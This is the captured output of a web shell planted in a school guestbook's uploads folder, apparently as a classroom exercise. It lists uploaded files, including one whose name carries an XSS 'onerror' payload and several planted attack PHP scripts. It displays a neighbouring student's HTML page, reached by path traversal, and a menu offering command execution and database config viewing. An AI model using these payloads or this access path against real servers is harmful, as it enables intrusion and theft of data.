🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../581827.klas4s23.mid-ica.nl/public_html/technowire/Programmeer.html

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link href="index.css" rel="stylesheet">
    <title>Programming Languages</title>
</head>

<body>
    <div class="wortelboot">
        <div class="menu4">
            <ul>
                <li><a href="index.html">Home</a></li>
                <li><a href="Hall.html">Hall of fame</a></li>
                <li><a href="Programmeer.html">Programming Languages</a></li>
                <li><a href="Silicon.html">Silicon Valley</a></li>
            </ul>
        </div>
        <div class="logo4">
            <img src="TechnoWire_logo.png">

        </div>
        <div class="content2">
            <div class="language">
                <h2>Shell</h2>
                <p>Year: 1971</p>
                <img src="shell_logo.png" alt="">
                <p>Developer(s): Ken Thompson</p>
                <p>Features: Interpreter for commands in operating systems.</p>
                <a href="https://en.wikipedia.org/wiki/Unix_shell">More info about Shell</a>
            </div>

            <div class="language">
                <h2>C</h2>
                <p>Year: 1972</p>
                <img src="c_logo.png" alt="">
                <p>Developer(s): Dennis Ritchie</p>
                <p>Features: General, influential programming language.</p>
                <a href="https://en.wikipedia.org/wiki/C_(programming_language)">More info about C</a>
            </div>

            <div class="language">
                <h2>C++</h2>
                <p>Year: 1985</p>
                <img src="c++_logo.png">
                <p>Developer(s): Bjarne Stroustrup</p>
                <p>Features: Supports object-oriented programming.</p>
                <a href="https://isocpp.org/">More info about C++</a>
            </div>

            <div class="language">
                <h2>Python</h2>
                <p>Year: 1991</p>
                <img src="python_logo.png" alt="Python Logo">
                <p>Developer(s): Guido van Rossum</p>
                <p>Features: Simple, readable syntax used in various applications.</p>
                <a href="https://www.python.org/">More info about Python</a>
            </div>

            <div class="language">
                <h2>Ruby</h2>
                <p>Year: 1995</p>
                <img src="ruby_logo.png" alt="">
                <p>Developer(s): Yukihiro Matsumoto</p>
                <p>Features: Dynamic, object-oriented language for web development.</p>
                <a href="https://www.ruby-lang.org/en/">More info about Ruby</a>
            </div>

            <div class="language">
                <h2>PHP</h2>
                <p>Year: 1995</p>
                <img src="php_logo.png" alt="PHP Logo">
                <p>Developer(s): Rasmus Lerdorf</p>
                <p>Features: Mainly for server-side scripting in web development.</p>
                <a href="https://www.php.net/">More info about PHP</a>
            </div>

            <div class="language">
                <h2>JavaScript</h2>
                <p>Year: 1995</p>
                <img src="js.png" alt="JavaScript Logo">
                <p>Developer(s): Netscape Communications</p>
                <p>Features: Dynamic, widely used language for web development.</p>
                <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript">More info about JavaScript</a>
            </div>

            <div class="language">
                <h2>Java</h2>
                <p>Year: 1995</p>
                <img src="java_logo.png" alt="Java Logo">
                <p>Developer(s): Sun Microsystems</p>
                <p>Features: Platform-independent programming language.</p>
                <a href="https://www.java.com/nl/">More info about Java</a>
            </div>

            <div class="language">
                <h2>C#</h2>
                <p>Year: 2000</p>
                <img src="c3_logo.png" alt="">
                <p>Developer(s): Microsoft</p>
                <p>Features: For Windows applications and .NET development.</p>
                <a href="https://learn.microsoft.com/en-us/dotnet/csharp/">More info about C#</a>
            </div>

            <div class="language">
                <h2>TypeScript</h2>
                <p>Year: 2012</p>
                <img src="typescript_logo.png" alt="">
                <p>Developer(s): Microsoft</p>
                <p>Features: Superset of JavaScript, adds types.</p>
                <a href="https://www.typescriptlang.org/">More info about TypeScript</a>
            </div>
        </div>
    </div>
</body>

</html>

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!